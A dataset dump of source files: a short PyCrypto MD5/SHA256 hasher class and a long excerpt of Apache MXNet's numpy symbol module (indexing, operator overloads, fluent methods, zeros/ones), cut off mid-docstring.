repo_name
stringlengths
5
100
ref
stringlengths
12
67
path
stringlengths
4
244
copies
stringlengths
1
8
content
stringlengths
0
1.05M
authurlan/amdfin
refs/heads/develop
server/module/hasher.py
1
# -*- coding: utf-8 -*- from Crypto.Hash import MD5 from Crypto.Hash import SHA256 class Hasher(): def __init__(self): pass def md5(self, message): return MD5.new(message).hexdigest() def sha256(self, message): return SHA256.new(message).hexdigest() # vim: set ts=4 sw=4 sts=4 et:
DickJC123/mxnet
refs/heads/master
python/mxnet/symbol/numpy/_symbol.py
3
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=too-many-lines, unused-argument """numpy namespace for operators used in Gluon APIs dispatched by F=symbol module.""" import ctypes import numpy as _np from . import _op as _mx_np_op from ...base import _LIB, SymbolHandle, numeric_types, mx_uint, integer_types, string_types from ...base import c_str from ...base import py_str from ...util import check_call, set_module, _sanity_check_params from ...util import wrap_np_unary_func, wrap_np_binary_func from ...util import is_np_default_dtype from ...context import current_context from ..symbol import Symbol, Group from .._internal import _set_np_symbol_class from . import _internal as _npi try: from __builtin__ import slice as py_slice except ImportError: from builtins import slice as py_slice __all__ = ['zeros', 'zeros_like', 'ones', 'ones_like', 'full', 'full_like', 'empty_like', 'bitwise_not', 'invert', 'delete', 'add', 'broadcast_to', 'subtract', 'multiply', 'divide', 'mod', 'remainder', 'fmod', 'power', 'arctan2', 'trace', 'transpose', 'copy', 'moveaxis', 'reshape', 'dot', 'sin', 'cos', 'tan', 'sinh', 'cosh', 'tanh', 'log10', 'sqrt', 'cbrt', 'abs', 'absolute', 'fabs', 'exp', 'expm1', 'arcsin', 'arccos', 'arctan', 'sign', 'log', 'degrees', 'log2', 'log1p', 'matmul', 'median', 'rint', 'radians', 'reciprocal', 'square', 'negative', 'fix', 'ceil', 'floor', 'histogram', 'insert', 'trunc', 'logical_not', 'arcsinh', 'arccosh', 'arctanh', 'argsort', 'sort', 'tensordot', 'eye', 'linspace', 'logspace', 'expand_dims', 'tile', 'arange', 'array_split', 'split', 'hsplit', 'vsplit', 'dsplit', 'concatenate', 'append', 'stack', 'vstack', 'row_stack', 'column_stack', 'hstack', 'dstack', 'average', 'mean', 'maximum', 'fmax', 'minimum', 'fmin', 'any', 'all', 'around', 'round', 'round_', 'flatnonzero', 'tril_indices', 'amax', 'amin', 'max', 'min', 'logical_and', 'logical_or', 'logical_xor', 'swapaxes', 'clip', 'argmax', 'argmin', 'std', 'var', 'indices', 'copysign', 'ravel', 'unravel_index', 'diag_indices_from', 'hanning', 'hamming', 'blackman', 'flip', 'flipud', 'fliplr', 'hypot', 'bitwise_and', 'bitwise_xor', 'bitwise_or', 'rad2deg', 'deg2rad', 'unique', 'lcm', 'gcd', 'interp', 'tril', 'triu', 'tri', 'identity', 'take', 'ldexp', 'vdot', 'inner', 'outer', 'cross', 'kron', 'equal', 'not_equal', 'greater', 'less', 'greater_equal', 'less_equal', 'roll', 'rot90', 'einsum', 'true_divide', 'quantile', 'percentile', 'shares_memory', 'may_share_memory', 'diff', 'ediff1d', 'resize', 'polyval', 'nan_to_num', 'isnan', 'isinf', 'isposinf', 'isneginf', 'isfinite', 'atleast_1d', 'atleast_2d', 'atleast_3d', 'squeeze', 'where', 'bincount', 'rollaxis', 'diagflat', 'repeat', 'prod', 'pad', 'cumsum', 'sum', 'diag', 'diagonal'] @set_module('mxnet.symbol.numpy') class _Symbol(Symbol): def __getitem__(self, key): # pylint: disable = too-many-return-statements, inconsistent-return-statements """Return self[key]. If the symbol is a symbol list, it returns the i-th symbol or a list of symbols selected by key. Otherwise, it outputs a symbol that slice the input by the given key. Currently, this function supports the following types of key: - integer types, e.g., int, long, np.int32, np.int64 - slice containing integer constants, e.g., slice(0, None, None) - tuple contaning the above elements, which is used for multidimensional indexing Parameters ---------- key : int, slice, or tuple of all previous types Indexing key. """ num_outputs = self.num_outputs if num_outputs > 1: num_outputs = self.num_outputs if isinstance(key, integer_types): key = int(key) if key < -num_outputs or key >= num_outputs: raise IndexError('list index out of range') if key < 0: key += num_outputs ret_handle = SymbolHandle() check_call(_LIB.MXSymbolGetOutput(self.handle, mx_uint(key), ctypes.byref(ret_handle))) return _Symbol(handle=ret_handle) elif isinstance(key, py_slice): start, stop, step = key.indices(num_outputs) return Group([self[i] for i in range(start, stop, step)], _Symbol) else: raise TypeError('indices of symbol group must be integers or slices, not {}' .format(type(key))) else: all = __builtins__['all'] # pylint: disable=redefined-outer-name if isinstance(key, integer_types): if key == -1: sliced = _npi.slice(self, [key], [None]) else: sliced = _npi.slice(self, [key], [key+1]) return _npi.reshape(sliced, (-3, -4)) elif isinstance(key, py_slice): if key.step is None or key.step != 0: start = [None] if key.start is None else key.start stop = [None] if key.stop is None else key.stop return _npi.slice(self, start, stop, key.step) else: raise ValueError("slice step cannot be zero") elif isinstance(key, Symbol): return _npi.advanced_indexing(self, key) elif isinstance(key, tuple) and len(key) == 0: return self elif isinstance(key, tuple) and all(isinstance(k, Symbol) for k in key): key = _npi.stack(*[i for i in key]) sliced = _npi.advanced_indexing_multiple(self, key) return sliced elif isinstance(key, tuple): begin = [] end = [] step = [] new_shape = () assert len(key) # len(key) == 0 handled above for index in key: if isinstance(index, py_slice): if index.step is not None and index.step == 0: raise ValueError("slice step cannot be zero") begin.append(index.start) end.append(index.stop) step.append(index.step) new_shape += (-2,) elif isinstance(index, integer_types): if index >= 0: begin.append(index) end.append(index+1) step.append(1) else: begin.append(index) end.append(index - 1) step.append(-1) new_shape += (-3,) else: raise IndexError('Only integer, slice, symbol or tuple of these types' ' are supported! Received key={}'.format(key)) new_shape += (-4,) sliced = _npi.slice(self, begin, end, step) return _npi.reshape(sliced, new_shape) else: raise IndexError('Only integer, slice, tuple or Symbol of these types are supported! ' 'Received key={}'.format(key)) def __setitem__(self, key, value): raise NotImplementedError def __repr__(self): """Gets a string representation of the symbol.""" if self._alive: if self.num_outputs > 1: name = ', '.join([str(ele_sym) for ele_sym in self]) return '<%s group [%s]>' % (self.__class__.__name__, name) else: return '<%s %s>' % (self.__class__.__name__, self.name) else: return '<FREED {}>'.format(self.__class__.__name__) @property def name(self): """Gets name string from the symbol, this function only works for symbols that are not a list (grouped symbols). Returns ------- value : str The name of this symbol, returns ``None`` for list symbol. """ if self.num_outputs > 1: raise AttributeError('This is a Group Symbol that contains {} elements and' ' does not have a name. Use str(sym) to print the name of ' 'all the elements instead.'.format(self.num_outputs)) ret = ctypes.c_char_p() success = ctypes.c_int() check_call(_LIB.MXSymbolGetName( self.handle, ctypes.byref(ret), ctypes.byref(success))) assert success.value != 0,\ 'Fail to infer the name of a symbol that is not a list!' return py_str(ret.value) def __iter__(self): if self.num_outputs == 1: raise TypeError("'{}' is not iterable.".format(self)) return iter((self[i] for i in range(self.num_outputs))) def __add__(self, other): """x.__add__(y) <=> x + y""" return add(self, other) def __invert__(self): """x.__invert__() <=> ~x""" return invert(self) def __and__(self, other): """x.__and__(y) <=> x & y""" return bitwise_and(self, other) def __or__(self, other): """x.__or__(y) <=> x | y""" return bitwise_or(self, other) def __xor__(self, other): """x.__xor__(y) <=> x ^ y""" return bitwise_xor(self, other) def __round__(self, n=0): """x.__round__(n)""" return round(self, decimals=n) def __abs__(self): """x.__abs__()""" return absolute(self) def __ceil__(self): """x.__ceil__()""" return ceil(self) def __floor__(self): """x.__floor__()""" return floor(self) def __trunc__(self): """x.__trunc__()""" return trunc(self) def __sub__(self, other): """x.__sub__(y) <=> x - y""" return subtract(self, other) def __rsub__(self, other): """x.__rsub__(y) <=> y - x""" return subtract(other, self) def __mul__(self, other): """x.__mul__(y) <=> x * y""" return multiply(self, other) def __rmul__(self, other): """x.__rmul__(y) <=> y * x""" return multiply(other, self) def __div__(self, other): """x.__truediv__(y) <=> x / y""" return divide(self, other) def __rdiv__(self, other): """x.__rdiv__(y) <=> y / x""" return divide(other, self) def __mod__(self, other): """x.__mod__(y) <=> x % y""" return mod(self, other) def __rmod__(self, other): """x.__rmod__(y) <=> y % x""" return mod(other, self) def __idiv__(self, other): raise NotImplementedError def __truediv__(self, other): """x.__truediv__(y) <=> x / y""" return divide(self, other) def __rtruediv__(self, other): """x.__rtruediv__(y) <=> y / x""" return divide(other, self) def __itruediv__(self, other): raise NotImplementedError def __pow__(self, other): """x.__pow__(y) <=> x ** y""" return power(self, other) def __rpow__(self, other): return power(other, self) def __neg__(self): """x.__neg__() <=> - x""" return negative(self) def __deepcopy__(self, _): return super().__deepcopy__(_).as_np_ndarray() def __eq__(self, other): """x.__eq__(y) <=> x == y""" return equal(self, other) def __ne__(self, other): """x.__ne__(y) <=> x != y""" return not_equal(self, other) def __gt__(self, other): """x.__gt__(y) <=> x > y""" return greater(self, other) def __ge__(self, other): """x.__ge__(y) <=> x >= y""" return greater_equal(self, other) def __lt__(self, other): """x.__lt__(y) <=> x < y""" return less(self, other) def __le__(self, other): """x.__le__(y) <=> x <= y""" return less_equal(self, other) def __len__(self): if self.num_outputs == 1: raise TypeError('{} is not a list and does not support len().'.format(self)) return self.num_outputs @property def num_outputs(self): """The number of outputs of a symbol. If the symbol is not a symbollist, it returns 1. Otherwise, it returns the number of elements of the list.""" output_count = mx_uint() check_call(_LIB.MXSymbolGetNumOutputs(self.handle, ctypes.byref(output_count))) return output_count.value def as_nd_ndarray(self): """Convert _Symbol to mxnet.symbol.Symbol to use its convenience fluent methods.""" hdl = SymbolHandle() check_call(_LIB.MXShallowCopySymbol(self.handle, ctypes.byref(hdl))) return Symbol(handle=hdl) def as_np_ndarray(self): """For the convenience of conversion between legacy and np symbols.""" return self @property # pylint: disable= invalid-name, undefined-variable def T(self): """Same as self.transpose().""" return self.transpose() # pylint: enable= invalid-name, undefined-variable def astype(self, dtype, order='K', casting='unsafe', subok=True, copy=True): # pylint: disable=arguments-differ,unused-argument,too-many-arguments,redefined-outer-name """ Copy of the array, cast to a specified type. Parameters ---------- dtype : str or dtype Typecode or data-type to which the array is cast. order : {'C', 'F', 'A', 'K'}, optional Controls the memory layout order of the result. 'C' means C order, 'F' means Fortran order, 'A' means 'F' order if all the arrays are Fortran contiguous, 'C' order otherwise, and 'K' means as close to the order the array elements appear in memory as possible. Default is 'K'. casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe'}, optional Controls what kind of data casting may occur. Defaults to 'unsafe' for backwards compatibility. * 'no' means the data types should not be cast at all. * 'equiv' means only byte-order changes are allowed. * 'safe' means only casts which can preserve values are allowed. * 'same_kind' means only safe casts or casts within a kind, like float64 to float32, are allowed. * 'unsafe' means any data conversions may be done. subok : bool, optional If True, then sub-classes will be passed-through (default), otherwise the returned array will be forced to be a base-class array. copy : bool, optional Default `True`. By default, astype always returns a newly allocated ndarray on the same context. If this is set to `False`, and the dtype requested is the same as the ndarray's dtype, the ndarray is returned instead of a copy. Returns ------- arr_t : ndarray Unless `copy` is False and the other conditions for returning the input array are satisfied (see description for `copy` input parameter), `arr_t` is a new array of the same shape as the input array with `dtype`. Notes ----- This function differs from the official `ndarray`'s ``astype`` function in the following aspects: - `order` only supports 'C' and 'K'. - `casting` only supports 'unsafe'. - `subok` only supports ``True``. """ if order is not None and order != 'K' and order != 'C': raise ValueError('order must be either \'K\' or \'C\'') if casting != 'unsafe': raise ValueError('casting must be equal to \'unsafe\'') if not subok: raise ValueError('subok must be equal to True') return _npi.cast(self, dtype=dtype) def dot(self, b, out=None): """Dot product of two arrays. Refer to ``numpy.dot`` for full documentation.""" return _npi.dot(self, b, out=out) def reshape(self, *args, **kwargs): # pylint: disable=arguments-differ """Returns a copy of the array with a new shape. Notes ----- Unlike the free function `mxnet.numpy.reshape`, this method on `ndarray` allows the elements of the shape parameter to be passed in as separate arguments. For example, ``a.reshape(10, 11)`` is equivalent to ``a.reshape((10, 11))``. """ order = 'C' if len(kwargs) > 1: raise TypeError('function takes at most 1 keyword argument') if len(kwargs) == 1: if 'order' not in kwargs: raise TypeError('{} is an invalid keyword argument for this function' .format(kwargs.keys()[0])) order = kwargs.pop('order', 'C') if order != 'C': raise NotImplementedError('only supports C-order,' ' while received {}'.format(order)) if len(args) == 0: raise TypeError('reshape() takes exactly 1 argument (0 given)') if len(args) == 1 and isinstance(args[0], tuple): return _mx_np_op.reshape(self, newshape=args[0], order=order) else: return _mx_np_op.reshape(self, newshape=args, order=order) def argmax(self, axis=None, out=None): # pylint: disable=arguments-differ """Return indices of the maximum values along the given axis. Refer to `mxnet.numpy.argmax` for full documentation.""" return argmax(self, axis, out) def reshape_like(self, *args, **kwargs): """Convenience fluent method for :py:func:`reshape_like`. The arguments are the same as for :py:func:`reshape_like`, with this array as data. """ raise AttributeError('_Symbol object has no attribute reshape_like') def zeros_like(self, *args, **kwargs): """Convenience fluent method for :py:func:`zeros_like`. The arguments are the same as for :py:func:`zeros_like`, with this array as data. """ raise AttributeError('_Symbol object has no attribute zeros_like') def ones_like(self, *args, **kwargs): """Convenience fluent method for :py:func:`ones_like`. The arguments are the same as for :py:func:`ones_like`, with this array as data. """ raise AttributeError('_Symbol object has no attribute ones_like') def broadcast_axes(self, *args, **kwargs): """Convenience fluent method for :py:func:`broadcast_axes`. The arguments are the same as for :py:func:`broadcast_axes`, with this array as data. """ raise AttributeError('_Symbol object has no attribute broadcast_like') def repeat(self, repeats, axis=None): # pylint: disable=arguments-differ """Repeat elements of an array.""" return repeat(self, repeats=repeats, axis=axis) def pad(self, *args, **kwargs): """Convenience fluent method for :py:func:`pad`. The arguments are the same as for :py:func:`pad`, with this array as data. """ raise AttributeError('_Symbol object has no attribute pad') def swapaxes(self, axis1, axis2): # pylint: disable=arguments-differ """Return a copy of the array with axis1 and axis2 interchanged. Refer to `mxnet.numpy.swapaxes` for full documentation. """ return swapaxes(self, axis1, axis2) def split(self, *args, **kwargs): """Convenience fluent method for :py:func:`split`. The arguments are the same as for :py:func:`split`, with this array as data. """ raise AttributeError('_Symbol object has no attribute split') def split_v2(self, *args, **kwargs): """Convenience fluent method for :py:func:`split_v2`. The arguments are the same as for :py:func:`split_v2`, with this array as data. """ raise AttributeError('_Symbol object has no attribute split_v2') def slice(self, *args, **kwargs): """Convenience fluent method for :py:func:`slice`. The arguments are the same as for :py:func:`slice`, with this array as data. """ raise AttributeError('_Symbol object has no attribute slice') def slice_axis(self, *args, **kwargs): """Convenience fluent method for :py:func:`slice_axis`. The arguments are the same as for :py:func:`slice_axis`, with this array as data. """ raise AttributeError('_Symbol object has no attribute slice_axis') def slice_like(self, *args, **kwargs): """Convenience fluent method for :py:func:`slice_like`. The arguments are the same as for :py:func:`slice_like`, with this array as data. """ raise AttributeError('_Symbol object has no attribute slice_like') def take(self, indices, axis=None, mode='raise'): # pylint: disable=arguments-differ, redefined-outer-name """Convenience fluent method for :py:func:`take`. The arguments are the same as for :py:func:`take`, with this array as data. """ return take(self, indices, axis, mode=mode) def one_hot(self, *args, **kwargs): """Convenience fluent method for :py:func:`one_hot`. The arguments are the same as for :py:func:`one_hot`, with this array as data. """ raise AttributeError('_Symbol object has no attribute one_hot') def pick(self, *args, **kwargs): """Convenience fluent method for :py:func:`pick`. The arguments are the same as for :py:func:`pick`, with this array as data. """ raise AttributeError('_Symbol object has no attribute pick') def sort(self, axis=-1, kind=None, order=None): # pylint: disable=arguments-differ """Convenience fluent method for :py:func:`sort`. The arguments are the same as for :py:func:`sort`, with this array as data. """ raise sort(self, axis=axis, kind=kind, order=order) def topk(self, *args, **kwargs): """Convenience fluent method for :py:func:`topk`. The arguments are the same as for :py:func:`topk`, with this array as data. """ raise AttributeError('_Symbol object has no attribute topk') def argsort(self, axis=-1, kind=None, order=None): # pylint: disable=arguments-differ """Convenience fluent method for :py:func:`argsort`. The arguments are the same as for :py:func:`argsort`, with this array as data. """ return argsort(self, axis=axis, kind=kind, order=order) def argmax_channel(self, *args, **kwargs): """Convenience fluent method for :py:func:`argmax_channel`. The arguments are the same as for :py:func:`argmax_channel`, with this array as data. """ raise AttributeError('_Symbol object has no attribute argmax_channel') def argmin(self, axis=None, out=None): # pylint: disable=arguments-differ """Return indices of the minimum values along the given axis. Refer to `mxnet.numpy.argmax` for full documentation.""" return argmin(self, axis, out) def clip(self, min=None, max=None, out=None): # pylint: disable=arguments-differ, redefined-outer-name """Return an array whose values are limited to [min, max]. One of max or min must be given. """ return clip(self, min, max, out=out) def abs(self, *args, **kwargs): """Convenience fluent method for :py:func:`abs`. The arguments are the same as for :py:func:`abs`, with this array as data. """ raise AttributeError('_Symbol object has no attribute abs') def sign(self, *args, **kwargs): """Convenience fluent method for :py:func:`sign`. The arguments are the same as for :py:func:`sign`, with this array as data. """ raise AttributeError('_Symbol object has no attribute abs') def flatten(self, order='C'): # pylint: disable=arguments-differ """Return a copy of the array collapsed into one dimension.""" return self.reshape(-1, order=order) def shape_array(self, *args, **kwargs): """Convenience fluent method for :py:func:`shape_array`. The arguments are the same as for :py:func:`shape_array`, with this array as data. """ raise AttributeError('_Symbol object has no attribute shape_array') def size_array(self, *args, **kwargs): """Convenience fluent method for :py:func:`size_array`. The arguments are the same as for :py:func:`size_array`, with this array as data. """ raise AttributeError('_Symbol object has no attribute size_array') def expand_dims(self, *args, **kwargs): # pylint: disable=arguments-differ,unused-argument """Convenience fluent method for :py:func:`expand_dims`. The arguments are the same as for :py:func:`expand_dims`, with this array as data. """ raise AttributeError('_Symbol object has no attribute expand_dims') def tile(self, *args, **kwargs): """Convenience fluent method for :py:func:`tile`. The arguments are the same as for :py:func:`tile`, with this array as data. """ raise AttributeError('_Symbol object has no attribute tile') def transpose(self, *axes): # pylint: disable=arguments-differ """The arguments are the same as for :py:func:`transpose`, with this array as data. """ if len(axes) == 0: axes = None elif len(axes) == 1: if isinstance(axes[0], (tuple, list)): axes = axes[0] elif axes[0] is None: axes = None return transpose(self, axes=axes) def flip(self, *args, **kwargs): """Convenience fluent method for :py:func:`flip`. The arguments are the same as for :py:func:`flip`, with this array as data. """ raise AttributeError('_Symbol object has no attribute flip') def depth_to_space(self, *args, **kwargs): """Convenience fluent method for :py:func:`depth_to_space`. The arguments are the same as for :py:func:`depth_to_space`, with this array as data. """ raise AttributeError('_Symbol object has no attribute depth_to_space') def space_to_depth(self, *args, **kwargs): """Convenience fluent method for :py:func:`space_to_depth`. The arguments are the same as for :py:func:`space_to_depth`, with this array as data. """ raise AttributeError('_Symbol object has no attribute space_to_depth') def diag(self, k=0, **kwargs): """Convenience fluent method for :py:func:`diag`. The arguments are the same as for :py:func:`diag`, with this array as data. """ raise AttributeError('_Symbol object has no attribute diag') def diagonal(self, offset=0, axis1=0, axis2=1): # pylint: disable=arguments-differ """Return the diagonal with the given offset. If array has more than two dimensions, then the axes specified by axis1 and axis2 are used to determine the 2-D sub-array whose diagonal is returned. Refer to `mxnet.symbol.numpy.diagonal` for full documents. """ return diagonal(self, offset=offset, axis1=axis1, axis2=axis2) def sum(self, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ """Return the sum of the array elements over the given axis.""" return _npi.sum(self, axis=axis, dtype=dtype, out=out, keepdims=keepdims) def nansum(self, *args, **kwargs): """Convenience fluent method for :py:func:`nansum`. The arguments are the same as for :py:func:`nansum`, with this array as data. """ raise AttributeError('_Symbol object has no attribute nansum') def prod(self, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ """Return the product of the array elements over the given axis.""" return _mx_np_op.prod(self, axis=axis, dtype=dtype, keepdims=keepdims, out=out) def nanprod(self, *args, **kwargs): """Convenience fluent method for :py:func:`nanprod`. The arguments are the same as for :py:func:`nanprod`, with this array as data. """ raise AttributeError('_Symbol object has no attribute nanprod') def mean(self, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ """Returns the average of the array elements along given axis.""" return mean(self, axis=axis, dtype=dtype, out=out, keepdims=keepdims) def std(self, axis=None, dtype=None, out=None, ddof=0, keepdims=False): # pylint: disable=arguments-differ,too-many-arguments """Returns the standard deviation of the array elements along given axis.""" return std(self, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out) def var(self, axis=None, dtype=None, out=None, ddof=0, keepdims=False): # pylint: disable=arguments-differ,too-many-arguments """Returns the variance of the array elements, along given axis.""" return var(self, axis=axis, dtype=dtype, out=out, ddof=ddof, keepdims=keepdims) def cumsum(self, axis=None, dtype=None, out=None): """Return the cumulative sum of the elements along the given axis.""" return _npi.cumsum(self, axis=axis, dtype=dtype, out=out) def max(self, axis=None, out=None, keepdims=False): # pylint: disable=arguments-differ """Return the maximum along a given axis.""" return _npi.max(self, axis=axis, keepdims=keepdims, out=out) def min(self, axis=None, out=None, keepdims=False): # pylint: disable=arguments-differ """Return the minimum along a given axis.""" return _npi.min(self, axis=axis, keepdims=keepdims, out=out) def norm(self, *args, **kwargs): """Convenience fluent method for :py:func:`norm`. The arguments are the same as for :py:func:`norm`, with this array as data. """ raise AttributeError('_Symbol object has no attribute norm') def round(self, decimals=0, out=None, **kwargs): # pylint: disable=arguments-differ """Convenience fluent method for :py:func:`round`. The arguments are the same as for :py:func:`round`, with this array as data. """ return round(self, decimals=decimals, out=out, **kwargs) def rint(self, *args, **kwargs): """Convenience fluent method for :py:func:`rint`. The arguments are the same as for :py:func:`rint`, with this array as data. """ raise AttributeError('_Symbol object has no attribute rint') def fix(self, *args, **kwargs): """Convenience fluent method for :py:func:`fix`. The arguments are the same as for :py:func:`fix`, with this array as data. """ raise AttributeError('_Symbol object has no attribute fix') def floor(self, *args, **kwargs): """Convenience fluent method for :py:func:`floor`. The arguments are the same as for :py:func:`floor`, with this array as data. """ raise AttributeError('_Symbol object has no attribute floor') def ceil(self, *args, **kwargs): """Convenience fluent method for :py:func:`ceil`. The arguments are the same as for :py:func:`ceil`, with this array as data. """ raise AttributeError('_Symbol object has no attribute ceil') def trunc(self, *args, **kwargs): """Convenience fluent method for :py:func:`trunc`. The arguments are the same as for :py:func:`trunc`, with this array as data. """ raise AttributeError('_Symbol object has no attribute trunc') def sin(self, *args, **kwargs): """Convenience fluent method for :py:func:`sin`. The arguments are the same as for :py:func:`sin`, with this array as data. """ raise AttributeError('_Symbol object has no attribute sin') def cos(self, *args, **kwargs): """Convenience fluent method for :py:func:`cos`. The arguments are the same as for :py:func:`cos`, with this array as data. """ raise AttributeError('_Symbol object has no attribute cos') def tan(self, *args, **kwargs): """Convenience fluent method for :py:func:`tan`. The arguments are the same as for :py:func:`tan`, with this array as data. """ raise AttributeError('_Symbol object has no attribute tan') def arcsin(self, *args, **kwargs): """Convenience fluent method for :py:func:`arcsin`. The arguments are the same as for :py:func:`arcsin`, with this array as data. """ raise AttributeError('_Symbol object has no attribute arcsin') def arccos(self, *args, **kwargs): """Convenience fluent method for :py:func:`arccos`. The arguments are the same as for :py:func:`arccos`, with this array as data. """ raise AttributeError('_Symbol object has no attribute arccos') def arctan(self, *args, **kwargs): """Convenience fluent method for :py:func:`arctan`. The arguments are the same as for :py:func:`arctan`, with this array as data. """ raise AttributeError('_Symbol object has no attribute arctan') def degrees(self, *args, **kwargs): """Convenience fluent method for :py:func:`degrees`. The arguments are the same as for :py:func:`degrees`, with this array as data. """ raise AttributeError('_Symbol object has no attribute degrees') def radians(self, *args, **kwargs): """Convenience fluent method for :py:func:`radians`. The arguments are the same as for :py:func:`radians`, with this array as data. """ raise AttributeError('_Symbol object has no attribute radians') def sinh(self, *args, **kwargs): """Convenience fluent method for :py:func:`sinh`. The arguments are the same as for :py:func:`sinh`, with this array as data. """ raise AttributeError('_Symbol object has no attribute sinh') def cosh(self, *args, **kwargs): """Convenience fluent method for :py:func:`cosh`. The arguments are the same as for :py:func:`cosh`, with this array as data. """ raise AttributeError('_Symbol object has no attribute cosh') def tanh(self, *args, **kwargs): """Convenience fluent method for :py:func:`tanh`. The arguments are the same as for :py:func:`tanh`, with this array as data. """ raise AttributeError('_Symbol object has no attribute tanh') def arcsinh(self, *args, **kwargs): """Convenience fluent method for :py:func:`arcsinh`. The arguments are the same as for :py:func:`arcsinh`, with this array as data. """ raise AttributeError('_Symbol object has no attribute arcsinh') def arccosh(self, *args, **kwargs): """Convenience fluent method for :py:func:`arccosh`. The arguments are the same as for :py:func:`arccosh`, with this array as data. """ raise AttributeError('_Symbol object has no attribute arccosh') def arctanh(self, *args, **kwargs): """Convenience fluent method for :py:func:`arctanh`. The arguments are the same as for :py:func:`arctanh`, with this array as data. """ raise AttributeError('_Symbol object has no attribute arctanh') def exp(self, *args, **kwargs): """Convenience fluent method for :py:func:`exp`. The arguments are the same as for :py:func:`exp`, with this array as data. """ raise AttributeError('_Symbol object has no attribute exp') def expm1(self, *args, **kwargs): """Convenience fluent method for :py:func:`expm1`. The arguments are the same as for :py:func:`expm1`, with this array as data. """ raise AttributeError('_Symbol object has no attribute expm1') def log(self, *args, **kwargs): """Convenience fluent method for :py:func:`log`. The arguments are the same as for :py:func:`log`, with this array as data. """ raise AttributeError('_Symbol object has no attribute log') def log10(self, *args, **kwargs): """Convenience fluent method for :py:func:`log10`. The arguments are the same as for :py:func:`log10`, with this array as data. """ raise AttributeError('_Symbol object has no attribute log10') def log2(self, *args, **kwargs): """Convenience fluent method for :py:func:`log2`. The arguments are the same as for :py:func:`log2`, with this array as data. """ raise AttributeError('_Symbol object has no attribute log2') def log1p(self, *args, **kwargs): """Convenience fluent method for :py:func:`log1p`. The arguments are the same as for :py:func:`log1p`, with this array as data. """ raise AttributeError('_Symbol object has no attribute log1p') def sqrt(self, *args, **kwargs): """Convenience fluent method for :py:func:`sqrt`. The arguments are the same as for :py:func:`sqrt`, with this array as data. """ raise AttributeError('_Symbol object has no attribute sqrt') def rsqrt(self, *args, **kwargs): """Convenience fluent method for :py:func:`rsqrt`. The arguments are the same as for :py:func:`rsqrt`, with this array as data. """ raise AttributeError('_Symbol object has no attribute rsqrt') def cbrt(self, *args, **kwargs): """Convenience fluent method for :py:func:`cbrt`. The arguments are the same as for :py:func:`cbrt`, with this array as data. """ raise AttributeError('_Symbol object has no attribute cqrt') def rcbrt(self, *args, **kwargs): """Convenience fluent method for :py:func:`rcbrt`. The arguments are the same as for :py:func:`rcbrt`, with this array as data. """ raise AttributeError('_Symbol object has no attribute rcqrt') def square(self, *args, **kwargs): """Convenience fluent method for :py:func:`square`. The arguments are the same as for :py:func:`square`, with this array as data. """ raise AttributeError('_Symbol object has no attribute square') def reciprocal(self, *args, **kwargs): """Convenience fluent method for :py:func:`reciprocal`. The arguments are the same as for :py:func:`reciprocal`, with this array as data. """ raise AttributeError('_Symbol object has no attribute reciprocal') def relu(self, *args, **kwargs): """Convenience fluent method for :py:func:`relu`. The arguments are the same as for :py:func:`relu`, with this array as data. """ raise AttributeError('_Symbol object has no attribute relu') def sigmoid(self, *args, **kwargs): """Convenience fluent method for :py:func:`sigmoid`. The arguments are the same as for :py:func:`sigmoid`, with this array as data. """ raise AttributeError('_Symbol object has no attribute sigmoid') def softmax(self, *args, **kwargs): """Convenience fluent method for :py:func:`softmax`. The arguments are the same as for :py:func:`softmax`, with this array as data. """ raise AttributeError('_Symbol object has no attribute softmax') def log_softmax(self, *args, **kwargs): """Convenience fluent method for :py:func:`log_softmax`. The arguments are the same as for :py:func:`log_softmax`, with this array as data. """ raise AttributeError('_Symbol object has no attribute log_softmax') def softmin(self, *args, **kwargs): """Convenience fluent method for :py:func:`softmin`. The arguments are the same as for :py:func:`softmin`, with this array as data. """ raise AttributeError('_Symbol object has no attribute softmin') def squeeze(self, axis=None): # pylint: disable=arguments-differ """Remove single-dimensional entries from the shape of a.""" return squeeze(self, axis=axis) def broadcast_to(self, *args, **kwargs): raise AttributeError('_Symbol object has no attribute broadcast_to') def broadcast_like(self, *args, **kwargs): raise AttributeError('_Symbol object has no attribute broadcast_like') # pylint: disable=too-many-arguments def optimize_for(self, backend, args=None, aux=None, ctx=None, shape_dict=None, type_dict=None, stype_dict=None, skip_infer=False, **kwargs): """Partitions current symbol and optimizes it for a given backend.""" new_sym = super().optimize_for(backend, args, aux, ctx, shape_dict, type_dict, stype_dict, skip_infer, **kwargs) new_sym = new_sym.as_np_ndarray() return new_sym @set_module('mxnet.symbol.numpy') def zeros(shape, dtype=float, order='C', ctx=None): """Return a new array of given shape and type, filled with zeros. This function currently only supports storing multi-dimensional data in row-major (C-style). Parameters ---------- shape : int or tuple of int The shape of the empty array. dtype : str or numpy.dtype, optional An optional value type . When npx.is_np_default_dtype() returns False, default dtype is float32; When npx.is_np_default_dtype() returns True, default dtype is float64. Note that this behavior is different from NumPy's `zeros` function where `float64` is the default value, here we can set 'float32' or 'float64' as your default dtype, because `float32` is considered as the default data type in deep learning. order : {'C'}, optional, default: 'C' How to store multi-dimensional data in memory, currently only row-major (C-style) is supported. ctx : Context, optional An optional device context (default is the current default context). Returns ------- out : Symbol Array of zeros with the given shape, dtype, and ctx. """ if order != 'C': raise NotImplementedError if ctx is None: ctx = current_context() if dtype is None or dtype is float: dtype = _np.float64 if is_np_default_dtype() else _np.float32 return _npi.zeros(shape=shape, ctx=ctx, dtype=dtype) @set_module('mxnet.symbol.numpy') def ones(shape, dtype=None, order='C', ctx=None): """Return a new array of given shape and type, filled with ones. This function currently only supports storing multi-dimensional data in row-major (C-style). Parameters ---------- shape : int or tuple of int The shape of the empty array. dtype : str or numpy.dtype, optional An optional value type. When npx.is_np_default_dtype() returns False, default dtype is float32; When npx.is_np_default_dtype() returns True, default dtype is 